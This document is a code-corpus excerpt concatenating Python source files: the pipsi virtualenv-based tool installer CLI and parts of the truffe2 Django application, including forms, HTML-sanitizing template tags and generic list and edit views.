importer.execute()
# def test_generate_names(test_files_dir):
#
# # Generate Names
# name_count = 200
# _names = {}
# for gender in 'male female'.split():
# _names[f'first_names_{gender}'] = [
# names.get_first_name(gender=gender)
# for _ in range(name_count)
# ]
# _names['last_names'] = [
# names.get_last_name()
# for _ in range(name_count * 2)
# ]
#
# # Save to file
# test_file_path = test_files_dir / 'names.toml'
# test_file_path.write_text(toml.dumps(_names))
#
# def test_toml(test_files_dir):
# import toml
# _d = {
# 'happy': 'a',
# 'fdsafdsa': 'b',
# }
#
# path = test_files_dir / 'myfile.toml'
# path.write_text(toml.dumps(_d))
``` |
{
"source": "jonathanchu/pipsi",
"score": 2
} |
#### File: jonathanchu/pipsi/pipsi.py
```python
import os
import sys
import shutil
from urlparse import urlparse
import click
from pkg_resources import safe_name
def normalize_package(value):
# Strips the version and normalizes name
return str(safe_name(value.strip().split('=')[0]).lower())
def real_readlink(filename):
try:
target = os.readlink(filename)
except (OSError, IOError):
return None
return os.path.normpath(os.path.realpath(
os.path.join(os.path.dirname(filename), target)))
class UninstallInfo(object):
def __init__(self, package, paths=None, installed=True):
self.package = package
self.paths = paths or []
self.installed = installed
def perform(self):
for path in self.paths:
try:
os.remove(path)
except OSError:
shutil.rmtree(path)
class Repo(object):
def __init__(self):
self.home = os.path.expanduser('~/.local/venvs')
self.bin_dir = os.path.expanduser('~/.local/bin')
def resolve_package(self, spec, python=None):
url = urlparse(spec)
if url.netloc == 'file':
location = url.path
elif url.netloc != '':
if not url.fragment.startswith('egg='):
raise click.UsageError('When installing from URLs you need '
'to add an egg at the end. For '
'instance git+https://.../#egg=Foo')
return url.fragment[4:], [spec]
elif os.path.isdir(spec):
location = spec
else:
return spec, [spec]
from subprocess import Popen, PIPE
p = Popen([python or sys.executable, 'setup.py', '--name'],
stdout=PIPE, stderr=PIPE, cwd=location)
name = p.communicate()[0].strip()
if p.returncode != 0:
raise click.UsageError('%s does not appear to be a local '
'Python package.' % spec)
return name.strip(), [location]
def get_package_path(self, package):
return os.path.join(self.home, normalize_package(package))
def find_installed_executables(self, path):
prefix = os.path.realpath(os.path.normpath(path)) + '/'
try:
for filename in os.listdir(self.bin_dir):
exe = os.path.join(self.bin_dir, filename)
target = real_readlink(exe)
if target is None:
continue
if target.startswith(prefix):
yield exe
except OSError:
pass
def find_scripts(self, virtualenv, package):
prefix = os.path.normpath(os.path.realpath(os.path.join(
virtualenv, 'bin'))) + '/'
from subprocess import Popen, PIPE
files = Popen([prefix + 'python', '-c', r'''if 1:
import os
import pkg_resources
dist = pkg_resources.get_distribution(%(pkg)r)
if dist.has_metadata('RECORD'):
for line in dist.get_metadata_lines('RECORD'):
print(line.split(',')[0])
elif dist.has_metadata('installed-files.txt'):
for line in dist.get_metadata_lines('installed-files.txt'):
print(os.path.join(dist.egg_info, line.split(',')[0]))
elif dist.has_metadata('entry_points.txt'):
try:
from ConfigParser import SafeConfigParser
from StringIO import StringIO
except ImportError:
from configparser import SafeConfigParser
from io import StringIO
parser = SafeConfigParser()
parser.readfp(StringIO(
'\n'.join(dist.get_metadata_lines('entry_points.txt'))))
if parser.has_section('console_scripts'):
for name, _ in parser.items('console_scripts'):
print os.path.join(%(prefix)r, name)
''' % {'pkg': package, 'prefix': prefix}],
stdout=PIPE).communicate()[0].splitlines()
for filename in files:
filename = os.path.normpath(os.path.realpath(filename))
if os.path.isfile(filename) and \
filename.startswith(prefix) and \
os.access(filename, os.X_OK):
yield filename
def link_scripts(self, scripts):
rv = []
for script in scripts:
script_dst = os.path.join(
self.bin_dir, os.path.basename(script))
old_target = real_readlink(script_dst)
if old_target == script:
continue
try:
os.remove(script_dst)
except OSError:
pass
try:
os.symlink(script, script_dst)
except OSError:
pass
else:
click.echo(' Linked script %s' % script_dst)
rv.append((script, script_dst))
return rv
def install(self, package, python=None, editable=False):
package, install_args = self.resolve_package(package, python)
venv_path = self.get_package_path(package)
if os.path.isdir(venv_path):
click.echo('%s is already installed' % package)
return
if not os.path.exists(self.bin_dir):
os.makedirs(self.bin_dir)
from subprocess import Popen
def _cleanup():
try:
shutil.rmtree(venv_path)
except (OSError, IOError):
pass
return False
# Install virtualenv
args = ['virtualenv']
if python is not None:
args.append('-p')
args.append(python)
args.append(venv_path)
try:
if Popen(args).wait() != 0:
click.echo('Failed to create virtualenv. Aborting.')
return _cleanup()
args = [os.path.join(venv_path, 'bin', 'pip'), 'install']
if editable:
args.append('--editable')
if Popen(args + install_args).wait() != 0:
click.echo('Failed to pip install. Aborting.')
return _cleanup()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
_cleanup()
raise exc_type, exc_value, tb
# Find all the scripts
scripts = self.find_scripts(venv_path, package)
# And link them
linked_scripts = self.link_scripts(scripts)
# We did not link any, rollback.
if not linked_scripts:
click.echo('Did not find any scripts. Uninstalling.')
return _cleanup()
return True
def uninstall(self, package):
path = self.get_package_path(package)
if not os.path.isdir(path):
return UninstallInfo(package, installed=False)
paths = [path]
paths.extend(self.find_installed_executables(path))
return UninstallInfo(package, paths)
def upgrade(self, package, editable=False):
package, install_args = self.resolve_package(package)
venv_path = self.get_package_path(package)
if not os.path.isdir(venv_path):
click.echo('%s is not installed' % package)
return
from subprocess import Popen
old_scripts = set(self.find_scripts(venv_path, package))
args = [os.path.join(venv_path, 'bin', 'pip'), 'install',
'--upgrade']
if editable:
args.append('--editable')
if Popen(args + install_args).wait() != 0:
click.echo('Failed to upgrade through pip. Aborting.')
return
scripts = self.find_scripts(venv_path, package)
linked_scripts = self.link_scripts(scripts)
to_delete = old_scripts - set(x[0] for x in linked_scripts)
for script_src, script_link in linked_scripts:
if script_src in to_delete:
try:
click.echo(' Removing old script %s' % script_src)
os.remove(script_link)
except (IOError, OSError):
pass
def list_everything(self):
venvs = {}
for venv in os.listdir(self.home):
venv_path = os.path.join(self.home, venv)
if os.path.isdir(venv_path) and \
os.path.isfile(venv_path + '/bin/python'):
venvs[venv] = []
def _find_venv(target):
for venv in venvs:
if target.startswith(os.path.join(self.home, venv) + '/'):
return venv
for script in os.listdir(self.bin_dir):
exe = os.path.join(self.bin_dir, script)
target = real_readlink(exe)
if target is None:
continue
venv = _find_venv(target)
if venv is not None:
venvs[venv].append(script)
return sorted(venvs.items())
pass_repo = click.make_pass_decorator(Repo, ensure=True)
@click.group()
@click.option('--home', type=click.Path(), default=None,
help='The folder that contains the virtualenvs.')
@click.option('--bin-dir', type=click.Path(), default=None,
help='The path where the scripts are symlinked to.')
@click.version_option()
@pass_repo
def cli(repo, home, bin_dir):
"""pipsi is a tool that uses virtualenv and pip to install shell
tools that are separated from each other.
"""
if home is not None:
repo.home = home
if bin_dir is not None:
repo.bin_dir = bin_dir
@cli.command()
@click.argument('package')
@click.option('--python', default=None,
help='The python interpreter to use.')
@click.option('--editable', is_flag=True,
help='Enable editable installation. This only works for '
'locally installed packages.')
@pass_repo
def install(repo, package, python, editable):
"""Installs scripts from a Python package.
Given a package this will install all the scripts and their dependencies
of the given Python package into a new virtualenv and symlinks the
discovered scripts into BIN_DIR (defaults to ~/.local/bin).
"""
if repo.install(package, python, editable):
click.echo('Done.')
@cli.command()
@click.argument('package')
@click.option('--editable', is_flag=True,
help='Enable editable installation. This only works for '
'locally installed packages.')
@pass_repo
def upgrade(repo, package, editable):
"""Upgrades an already installed package."""
if repo.upgrade(package, editable):
click.echo('Done.')
@cli.command(short_help='Uninstalls scripts of a package.')
@click.argument('package')
@click.option('--yes', is_flag=True, help='Skips all prompts.')
@pass_repo
def uninstall(repo, package, yes):
"""Uninstalls all scripts of a Python package and cleans up the
virtualenv.
"""
uinfo = repo.uninstall(package)
if not uinfo.installed:
click.echo('%s is not installed' % package)
else:
click.echo('The following paths will be removed:')
for path in uinfo.paths:
click.echo(' %s' % click.format_filename(path))
click.echo()
if yes or click.confirm('Do you want to uninstall %s?' % package):
uinfo.perform()
click.echo('Done!')
else:
click.echo('Aborted!')
@cli.command('list')
@pass_repo
def list_cmd(repo):
"""Lists all scripts installed through pipsi."""
click.echo('Packages and scripts installed through pipsi:')
for venv, scripts in repo.list_everything():
if not scripts:
continue
click.echo(' Package "%s":' % venv)
for script in scripts:
click.echo(' ' + script)
``` |
{
"source": "JonathanCollaud/truffe2",
"score": 2
} |
#### File: truffe2/communication/forms2.py
```python
from django.forms import ModelForm
from django.utils.safestring import mark_safe
from django.utils.html import escape
from .models import DisplayReservationLine, Display
class DisplayReservationLineForm(ModelForm):
class Meta:
model = DisplayReservationLine
exclude = ('display_reservation', 'order')
def __init__(self, *args, **kwargs):
super(DisplayReservationLineForm, self).__init__(*args, **kwargs)
self.fields['display'].queryset = Display.objects.filter(active=True, deleted=False).order_by('unit__name', 'title')
self.fields['display'].label_from_instance = lambda obj: mark_safe(u"[{}] {}".format(escape(obj.unit), escape(obj.title)))
```
#### File: truffe2/generic/startup.py
```python
from generic.models import GenericModel, GenericStateModel
def startup():
"""Create urls, models and cie at startup"""
GenericModel.startup()
```
#### File: generic/templatetags/generic_extras.py
```python
from django import template
from django.utils.safestring import mark_safe
import bleach
from bleach.sanitizer import BleachSanitizer
from bleach.encoding import force_unicode
from bootstrap3.renderers import FieldRenderer
from bootstrap3.text import text_value
import html5lib
import re
register = template.Library()
pos = [(0, 0), (1, 0), (0, 1), (2, 3), (1, 2), (2, 1), (2, 2)]
re_spaceless = re.compile("(\n|\r)+")
@register.filter
def node_x(value):
x, _ = pos[value]
return x
@register.filter
def node_y(value):
_, y = pos[value]
return y
@register.filter
def get_attr(value, arg):
v = getattr(value, arg, None)
if hasattr(v, '__call__'):
v = v()
elif isinstance(value, dict):
v = value.get(arg)
if v is None:
return ''
return v
@register.filter
def call(obj, methodName):
method = getattr(obj, methodName)
if "__callArg" in obj.__dict__:
ret = method(*obj.__callArg)
del obj.__callArg
return ret
return method()
@register.filter
def args(obj, arg):
if "__callArg" not in obj.__dict__:
obj.__callArg = []
obj.__callArg += [arg]
return obj
@register.filter
def get_class(value):
return value.__class__.__name__
@register.filter
def is_new_for(obj, user):
return obj.is_new(user)
@register.simple_tag(takes_context=True)
def switchable(context, obj, user, id):
return 'true' if obj.may_switch_to(user, id) else 'false'
@register.assignment_tag(takes_context=True)
def get_list_quick_switch(context, obj):
if hasattr(obj.MetaState, 'list_quick_switch'):
return filter(lambda (status, __, ___): obj.may_switch_to(context['user'], status), obj.MetaState.list_quick_switch.get(obj.status, []))
@register.assignment_tag(takes_context=True)
def get_states_quick_switch(context, obj):
if hasattr(obj.MetaState, 'states_quick_switch'):
return filter(lambda (status, __): obj.may_switch_to(context['user'], status), obj.MetaState.states_quick_switch.get(obj.status, []))
@register.tag
def nocrlf(parser, token):
nodelist = parser.parse(('endnocrlf',))
parser.delete_first_token()
return CrlfNode(nodelist)
class CrlfNode(template.Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
rendered = self.nodelist.render(context).strip()
return re_spaceless.sub("", rendered)
@register.filter
def html_check_and_safe(value):
tags = bleach.ALLOWED_TAGS + ['div', 'br', 'font', 'p', 'table', 'tr', 'td', 'th', 'img', 'u', 'span', 'tbody', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr']
attrs = {
'*': ['class', 'style', 'color', 'align', 'title', 'data-toggle', 'data-placement'],
'a': ['href', 'rel'],
'img': ['src', 'alt'],
}
style = ['line-height', 'background-color', 'font-size', 'margin-top']
text = force_unicode(value)
class s(BleachSanitizer):
allowed_elements = tags
allowed_attributes = attrs
allowed_css_properties = style
strip_disallowed_elements = True
strip_html_comments = True
allowed_protocols = ['http', 'https', 'data']
parser = html5lib.HTMLParser(tokenizer=s)
return mark_safe(bleach._render(parser.parseFragment(text)))
class SimpleFieldRenderer(FieldRenderer):
def render(self):
# See if we're not excluded
if self.field.name in self.exclude.replace(' ', '').split(','):
return ''
# Hidden input requires no special treatment
if self.field.is_hidden:
return text_value(self.field)
# Render the widget
self.add_widget_attrs()
html = self.field.as_widget(attrs=self.widget.attrs)
self.restore_widget_attrs()
# Start post render
html = self.post_widget_render(html)
html = self.wrap_widget(html)
html = self.make_input_group(html)
html = self.append_to_field(html)
html = self.wrap_field(html)
return html
@register.simple_tag()
def simple_bootstrap_field(field):
return SimpleFieldRenderer(field).render()
```
#### File: truffe2/generic/views.py
```python
from django.shortcuts import get_object_or_404, render, redirect
from django.views.decorators.csrf import csrf_exempt
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.db.models import Max, Q
from easy_thumbnails.files import get_thumbnailer
from jfu.http import upload_receive, UploadResponse, JFUResponse
import json
import datetime
import pytz
import uuid
import os
from sendfile import sendfile
import importlib
import copy
import inspect
import urllib
from wand.image import Image
from accounting_core.utils import CostCenterLinked
from generic.datatables import generic_list_json
from generic.forms import ContactForm
from app.utils import update_current_unit, get_current_unit, update_current_year, get_current_year, send_templated_mail, has_property, set_property
from rights.utils import BasicRightModel
def get_unit_data(model_class, request, allow_blank=True, allow_all_units=False):
from generic.models import GenericExternalUnitAllowed
unit_mode = hasattr(model_class.MetaData, 'has_unit') and model_class.MetaData.has_unit
unit_blank = allow_blank and unit_mode and issubclass(model_class, GenericExternalUnitAllowed)
current_unit = None
if unit_mode:
if request.GET.get('upk'):
update_current_unit(request, request.GET.get('upk'))
if request.POST.get('upk'):
update_current_unit(request, request.POST.get('upk'))
current_unit = get_current_unit(request, unit_blank, allow_all_units)
if current_unit and current_unit.is_hidden:
# Enpeche d'éventuel petit malins de trichers en mettant les IDs à la
# main
if not current_unit.check_if_can_use_hidden(request.user):
raise Http404
return unit_mode, current_unit, unit_blank
def get_year_data(model_class, request):
from accounting_core.utils import AccountingYearLinked
from accounting_core.models import AccountingYear
year_mode = issubclass(model_class, AccountingYearLinked)
current_year = None
if year_mode:
if request.GET.get('ypk'):
update_current_year(request, request.GET.get('ypk'))
if request.POST.get('ypk'):
update_current_year(request, request.POST.get('ypk'))
current_year = get_current_year(request)
return year_mode, current_year, AccountingYear
def generate_generic_list(module, base_name, model_class, json_view_suffix, right_to_check, right_to_check_edit, template_to_use, allow_blank, object_filter=False, bonus_args_transformator=None, tag_class=None, allow_all_units=False):
@login_required
def _generic_generic_list(request, **bonus_args):
json_view = '%s.views.%s%s' % (module.__name__, base_name, json_view_suffix)
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
deleted_view = '%s.views.%s_deleted' % (module.__name__, base_name)
status_view = '%s.views.%s_switch_status' % (module.__name__, base_name)
logs_view = '%s.views.%s_logs' % (module.__name__, base_name)
tag_search_view = '%s.views.%s_tag_search' % (module.__name__, base_name)
mayi_view = '%s.views.%s_mayi' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=allow_blank, allow_all_units=allow_all_units)
main_unit = None
allow_all_units_ = allow_all_units # Need a local copy
if unit_mode:
# Remove upk in urls (unit has been changed)
if 'upk' in request.GET:
get_params = dict(request.GET.iterlists())
del get_params['upk']
return HttpResponseRedirect('{}?{}'.format(request.path, urllib.urlencode(get_params)))
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
main_unit.set_rights_can_select(lambda unit: model_class.static_rights_can(right_to_check, request.user, unit, current_year))
main_unit.set_rights_can_edit(lambda unit: model_class.static_rights_can(right_to_check_edit, request.user, unit, current_year))
main_unit.check_if_can_use_hidden(request.user)
allow_all_units_ = allow_all_units and model_class.static_rights_can(right_to_check, request.user, main_unit, current_year)
else:
# The LIST right is not verified here if we're in unit mode. We
# need to test (in the view) in another unit is available for LIST
# if the current unit isn't !
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can(right_to_check, request.user, current_unit, current_year):
raise Http404
if hasattr(model_class, 'moderable_object') and model_class.moderable_object: # If the object is moderable, list all moderable things by the current user
# List all moderiables in the 'todo' satate
moderables = model_class.objects.filter(status=model_class.moderable_state).exclude(deleted=True)
# Filter to check if user has rights
moderables = filter(lambda m: m.rights_can('VALIDATE', request.user), moderables)
else:
moderables = False
if object_filter and hasattr(model_class, 'get_linked_object_class'):
objects = model_class.get_linked_object_class().objects.filter(unit=current_unit)
else:
objects = []
if bonus_args_transformator:
extra_data = bonus_args_transformator(request, **bonus_args) or {}
else:
extra_data = {}
data = {
'Model': model_class, 'json_view': json_view, 'edit_view': edit_view, 'deleted_view': deleted_view, 'show_view': show_view, 'status_view': status_view, 'logs_view': logs_view, 'tag_search_view': tag_search_view, 'mayi_view': mayi_view,
'unit_mode': unit_mode, 'main_unit': main_unit, 'unit_blank': unit_blank, 'allow_all_units': allow_all_units_,
'year_mode': year_mode, 'years_available': AccountingYear.build_year_menu('LIST', request.user),
'moderables': moderables, 'object_filter': objects, 'tag_mode': tag_class is not None, 'tag': request.GET.get('tag', ''),
}
data.update(extra_data)
if hasattr(model_class.MetaData, 'extra_args_for_list'):
data.update(model_class.MetaData.extra_args_for_list(request, current_unit, current_year))
return render(request, ['%s/%s/%s.html' % (module.__name__, base_name, template_to_use,), 'generic/generic/%s.html' % (template_to_use,)], data)
return _generic_generic_list
def generate_list(module, base_name, model_class, tag_class):
return generate_generic_list(module, base_name, model_class, '_list_json', 'LIST', 'CREATE', 'list', True, tag_class=tag_class, allow_all_units=True)
def generate_list_json(module, base_name, model_class, tag_class):
@login_required
@csrf_exempt
def _generic_list_json(request):
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
delete_view = '%s.views.%s_delete' % (module.__name__, base_name)
logs_view = '%s.views.%s_logs' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_all_units=True)
if unit_mode:
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
all_units_mode = unit_mode and current_unit and current_unit.pk == -2
if all_units_mode:
unit_to_check = main_unit
else:
unit_to_check = current_unit
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('LIST', request.user, unit_to_check, current_year):
raise Http404
if unit_mode and not all_units_mode:
if not current_unit:
if request.user.is_superuser or model_class.static_rights_can('LIST', request.user, main_unit, current_year): # Never filter
filter_ = lambda x: x.filter(unit=None)
else:
filter_ = lambda x: x.filter(unit=None, unit_blank_user=request.user)
else:
if hasattr(model_class.MetaData, 'costcenterlinked') and model_class.MetaData.costcenterlinked:
filter_ = lambda x: x.filter(Q(costcenter__deleted=False) & (Q(costcenter__unit=current_unit) | (Q(costcenter__unit__parent_hierarchique=current_unit) & Q(costcenter__unit__is_commission=False))))
else:
filter_ = lambda x: x.filter(unit=current_unit)
else:
filter_ = lambda x: x
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
if hasattr(model_class.MetaData, 'extra_filter_for_list'):
filter___ = model_class.MetaData.extra_filter_for_list(request, unit_to_check, current_year, filter__)
else:
filter___ = filter__
tag = request.GET.get('tag')
if tag_class and tag:
filter____ = lambda x: filter___(x).filter(tags__tag=tag).distinct()
else:
filter____ = filter___
return generic_list_json(request, model_class, [col for (col, disp) in model_class.MetaData.list_display] + ['pk'], [module.__name__ + '/' + base_name + '/list_json.html', 'generic/generic/list_json.html'],
{'Model': model_class,
'show_view': show_view,
'edit_view': edit_view,
'delete_view': delete_view,
'logs_view': logs_view,
'list_display': model_class.MetaData.list_display,
'all_units_mode': all_units_mode,
},
True, model_class.MetaData.filter_fields,
bonus_filter_function=filter____,
selector_column=True,
bonus_total_filter_function=filter___,
)
return _generic_list_json
def generate_list_related(module, base_name, model_class):
return generate_generic_list(module, base_name, model_class, '_list_related_json', 'VALIDATE', 'VALIDATE', 'list_related', False, True)
def generate_list_related_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generate_list_related_json(request):
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
delete_view = '%s.views.%s_delete' % (module.__name__, base_name)
logs_view = '%s.views.%s_logs' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=False)
if unit_mode:
if hasattr(model_class.MetaState, 'filter_unit_field'):
filter_ = lambda x: x.filter(**{model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit}).distinct()
else:
filter_ = lambda x: x.filter(**{model_class.MetaState.unit_field.replace('.', '__'): current_unit}).distinct()
else:
filter_ = lambda x: x.distinct()
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
def filter_object(qs, request):
if request.POST.get('sSearch_0'):
if hasattr(model_class.MetaState, 'filter_unit_field'):
return qs.filter(**{'__'.join(model_class.MetaState.filter_unit_field.split('.')[:-1] + ['pk']): request.POST.get('sSearch_0'), model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit})
else:
return qs.filter(**{'__'.join(model_class.MetaState.unit_field.split('.')[:-1] + ['pk']): request.POST.get('sSearch_0'), model_class.MetaState.unit_field.replace('.', '__'): current_unit})
else:
return qs
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('VALIDATE', request.user, current_unit, current_year):
raise Http404
return generic_list_json(request, model_class, [col for (col, disp) in model_class.MetaData.list_display_related] + ['pk'], [module.__name__ + '/' + base_name + '/list_related_json.html', 'generic/generic/list_related_json.html'],
{'Model': model_class,
'show_view': show_view,
'edit_view': edit_view,
'delete_view': delete_view,
'logs_view': logs_view,
'list_display': model_class.MetaData.list_display_related,
'upk_noswitch': True, 'from_related': True,
},
True, model_class.MetaData.filter_fields,
bonus_filter_function=filter__,
bonus_filter_function_with_parameters=filter_object,
deca_one_status=True,
selector_column=True,
)
return _generate_list_related_json
def generate_edit(module, base_name, model_class, form_class, log_class, file_class, tag_class):
from accounting_tools.models import LinkedInfo
@login_required
def _generic_edit(request, pk):
list_view = '%s.views.%s_list' % (module.__name__, base_name)
list_related_view = '%s.views.%s_list_related' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
file_upload_view = '%s.views.%s_file_upload' % (module.__name__, base_name)
file_delete_view = '%s.views.%s_file_delete' % (module.__name__, base_name)
file_get_view = '%s.views.%s_file_get' % (module.__name__, base_name)
file_get_thumbnail_view = '%s.views.%s_file_get_thumbnail' % (module.__name__, base_name)
tag_search_view = '%s.views.%s_tag_search' % (module.__name__, base_name)
related_mode = request.GET.get('_fromrelated') == '_'
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
extra_args = {}
try:
obj = model_class.objects.get(pk=pk, deleted=False)
if unit_mode:
obj_unit = obj.costcenter.unit if isinstance(obj, CostCenterLinked) else obj.unit
update_current_unit(request, obj_unit.pk if obj_unit else -1)
current_unit = obj_unit
if year_mode:
update_current_year(request, obj.accounting_year.pk)
current_year = obj.accounting_year
if isinstance(obj, BasicRightModel) and not obj.rights_can('EDIT', request.user):
raise Http404
except (ValueError, model_class.DoesNotExist):
obj = model_class()
if hasattr(model_class, 'MetaEdit') and hasattr(model_class.MetaEdit, 'set_extra_defaults'):
model_class.MetaEdit.set_extra_defaults(obj, request)
if unit_mode:
if unit_blank and not current_unit:
obj.unit_blank_user = request.user
if has_property(obj, 'MetaData.costcenterlinked') and obj.MetaData.costcenterlinked and current_unit.costcenter_set.first():
obj.costcenter = current_unit.costcenter_set.first()
if has_property(obj, obj.MetaRights.linked_unit_property):
set_property(obj, obj.MetaRights.linked_unit_property, current_unit)
else:
obj.unit = current_unit
if year_mode:
# Est-ce qu'on va tenter de créer un truc dans une année
# comptable pas possible ?
if current_year not in AccountingYear.build_year_menu('CREATE', request.user):
update_current_year(request, None)
___, current_year, ___ = get_year_data(model_class, request)
obj.accounting_year = current_year
if unit_mode and isinstance(obj, BasicRightModel) and not obj.rights_can('CREATE', request.user) and current_unit:
# Try to find a suitable unit, since the user may access
# this page without using a create button (who switched the
# unit)
from units.models import Unit
for test_unit in Unit.objects.order_by('?'):
if has_property(obj, obj.MetaRights.linked_unit_property):
set_property(obj, obj.MetaRights.linked_unit_property, test_unit)
else:
obj.unit = test_unit
if obj.rights_can('CREATE', request.user):
current_unit = test_unit
break
# Set the original (or new) unit
if has_property(obj, obj.MetaRights.linked_unit_property):
set_property(obj, obj.MetaRights.linked_unit_property, current_unit)
else:
obj.unit = current_unit
if isinstance(obj, BasicRightModel) and not obj.rights_can('CREATE', request.user):
raise Http404
if unit_mode:
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
main_unit.set_rights_can_select(lambda unit: model_class.static_rights_can('CREATE', request.user, unit, current_year))
main_unit.set_rights_can_edit(lambda unit: model_class.static_rights_can('CREATE', request.user, unit, current_year))
main_unit.check_if_can_use_hidden(request.user)
else:
main_unit = None
if obj.pk:
before_data = obj.build_state()
else:
before_data = None
file_mode = file_class is not None
file_key = None # Will be set later
from generic.models import GenericModelWithLines
lines_objects = []
if issubclass(model_class, GenericModelWithLines):
lines_objects = filter(lambda lo: not hasattr(obj.MetaEdit, 'only_if') or lo['related_name'] not in obj.MetaEdit.only_if or obj.MetaEdit.only_if[lo['related_name']]((obj, request.user)), copy.deepcopy(obj.MetaLines.lines_objects))
for line_data in lines_objects:
line_data['form'] = getattr(importlib.import_module('.'.join(line_data['form'].split('.')[:-1])), line_data['form'].split('.')[-1])
line_data['class'] = getattr(importlib.import_module('.'.join(line_data['class'].split('.')[:-1])), line_data['class'].split('.')[-1])
line_data['new_form'] = line_data['form'](prefix="_LINES_%s_-ID-" % (line_data['related_name'],))
line_data['forms'] = []
tag_mode = tag_class is not None
tags = []
if tag_mode:
tags_before = ','.join([t.tag for t in obj.tags.order_by('tag')]) if obj.pk else ''
linked_info_mode = hasattr(model_class, 'MetaEdit') and hasattr(model_class.MetaEdit, 'set_linked_info') and model_class.MetaEdit.set_linked_info
if request.method == 'POST': # If the form has been submitted...
form = form_class(request.user, request.POST, request.FILES, instance=obj)
form.truffe_request = request
if file_mode:
file_key = request.POST.get('file_key')
if tag_mode:
tags = filter(lambda t: t, request.POST.get('tags').split(','))
all_forms_valids = True
for line_data in lines_objects:
for submited_id in request.POST.getlist('_LINES_LIST_%s[]' % (line_data['related_name'], )):
if submited_id != '-ID-':
if submited_id.startswith('NEW-'):
line_instance = line_data['class'](**{line_data['field']: obj})
else:
line_instance = get_object_or_404(line_data['class'], pk=submited_id, **{line_data['field']: obj})
line_old_val = line_instance.__unicode__()
line_form = line_data['form'](request.POST, request.FILES, instance=line_instance, prefix="_LINES_%s_%s" % (line_data['related_name'], submited_id))
if not line_form.is_valid():
all_forms_valids = False
line_form_data = {'id': submited_id, 'form': line_form, 'old_val': line_old_val}
line_data['forms'].append(line_form_data)
form._clean_line_data = lines_objects
if form.is_valid() and all_forms_valids: # If the form is valid
right = 'EDIT' if obj.pk else 'CREATE'
obj = form.save(commit=False)
if not obj.rights_can(right, request.user):
messages.error(request, _(u'Tu n\'as pas le droit de créer/modifier cet objet.'))
return redirect('{}.views.{}_edit'.format(module.__name__, base_name), pk='~' if right == 'CREATE' else obj.pk)
obj.save()
if hasattr(form, 'save_m2m'):
form.save_m2m()
lines_adds = {}
lines_updates = {}
lines_deletes = {}
for line_data in lines_objects:
valids_ids = []
line_order = 0
for line_form in line_data['forms']:
line_obj = line_form['form'].save(commit=False)
setattr(line_obj, line_data['field'], obj)
if not line_obj.pk:
lines_adds['%s' % (line_data['related_name'],)] = line_obj.__unicode__()
else:
if line_form['old_val'] != line_obj.__unicode__():
lines_updates['%s #%s' % (line_data['related_name'], line_obj.pk,)] = (line_form['old_val'], line_obj.__unicode__())
if line_data['sortable']:
line_obj.order = line_order
line_order += 1
line_obj.save()
valids_ids.append(line_obj.pk)
for line_deleted in getattr(obj, line_data['related_name']).exclude(pk__in=valids_ids):
lines_deletes['%s #%s' % (line_data['related_name'], line_deleted.pk,)] = line_deleted.__unicode__()
line_deleted.delete()
if file_mode:
files_data = request.session.get('pca_files_%s' % (file_key,))
if files_data is None:
messages.warning(request, _(u'Erreur lors de la récupération de la session pour la gestion des fichiers. Il est possible que le formulaire aie été sauvegardé deux fois. Vérifiez si l\'état actuel des fichiers correspond à ce que vous désirez !'))
else:
for file_pk in files_data:
file_obj = file_class.objects.get(pk=file_pk)
if file_obj.object != obj:
file_obj.object = obj
file_obj.save()
log_class(who=request.user, what='file_added', object=obj, extra_data=file_obj.basename()).save()
for file_obj in obj.files.all():
if file_obj.pk not in files_data:
log_class(who=request.user, what='file_removed', object=obj, extra_data=file_obj.basename()).save()
os.unlink(file_obj.file.path)
file_obj.delete()
# Clean up session
del request.session['pca_files_%s' % (file_key,)]
if tag_mode:
for t in tags:
__, ___ = tag_class.objects.get_or_create(tag=t, object=obj)
tag_class.objects.filter(object=obj).exclude(tag__in=tags).delete()
tags_after = ', '.join([t.tag for t in obj.tags.order_by('tag')])
if linked_info_mode:
object_ct = ContentType.objects.get(app_label=module.__name__, model=base_name)
infos, __ = LinkedInfo.objects.get_or_create(content_type=object_ct, object_id=obj.pk, defaults={'user_pk': obj.user.pk})
for (info_field, user_field) in (('first_name', 'first_name'), ('last_name', 'last_name'), ('address', 'adresse'), ('phone', 'mobile'), ('bank', 'nom_banque'), ('iban_ccp', 'iban_ou_ccp'), ('user_pk', 'pk')):
setattr(infos, info_field, getattr(obj.user, user_field))
infos.save()
if isinstance(obj, BasicRightModel):
obj.rights_expire()
if hasattr(obj, 'save_signal'):
